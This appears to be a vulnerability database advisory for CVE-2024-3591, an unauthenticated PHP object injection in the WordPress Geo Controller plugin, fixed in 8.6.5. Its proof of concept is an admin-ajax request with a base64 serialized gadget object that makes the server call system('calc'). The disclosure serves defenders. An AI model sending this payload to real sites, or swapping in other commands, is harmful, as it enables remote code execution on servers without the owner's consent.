WordPress Geo Controller < 8.6.5 – PHP Object Injection | CVE 2024-3591 | Plugin Vulnerabilities

Description

The plugin unserializes user input via some of its AJAX actions and REST API routes, which could allow unauthenticated users to perform PHP Object Injection when a suitable gadget is present on the blog.

Proof of Concept

/wp-admin/admin-ajax.php?action=cf_geoplugin_shortcode_cache&options=TzoxMzoiV1BfSFRNTF9Ub2tlbiI6Mjp7czoxMzoiYm9va21hcmtfbmFtZSI7czo0OiJjYWxjIjtzOjEwOiJvbl9kZXN0cm95IjtzOjY6InN5c3RlbSI7fQ==

Affects Plugins

Fixed in 8.6.5

References

CVE

URL

https://github.com/fuyoumingyan/vul/blob/main/WordPress%20Geo%20Controller%20Plugin%20%20-%20PHP%20Object%20Injection.md

Classification

Type

OBJECT INJECTION

OWASP top 10

A8: Insecure Deserialization

CWE

Miscellaneous

Original Researcher

fuyoumingyan

Submitter

fuyoumingyan

Submitter website

https://github.com/fuyoumingyan/vul/blob/main/WordPress%20Geo%20Controller%20Plugin%20%20-%20PHP%20Object%20Injection.md

Verified

Yes

WPVDB ID

f85d8b61-eaeb-433c-b857-06ee4db5c7d5

Timeline

Publicly Published

2024-04-10 (about 1 months ago)

Added

2024-04-10 (about 1 months ago)

Last Updated

2024-04-10 (about 1 months ago)

Other

Published

Title

Published

2024-03-26

Title

Sunshine Photo Cart: Free Client Photo Galleries for Photographers < 3.1.2 - Unauthenticated PHP Object Injection

Published

2023-12-05

Title

Sayfa Sayaç <= 2.6 - Unauthenticated PHP Object Injection

Published

2022-11-17

Title

Shortcodes and extra features for Phlox theme < 2.10.7 - PHP Objection Injection

Published

2024-04-25

Title

Custom field finder < 0.4 - Authenticated (Author+) PHP Object Injection

Published

2024-02-29

Title

Slider Responsive Slideshow – Image slider, Gallery slideshow < 1.4.0 - Authenticated (Contributor+) PHP Object Injection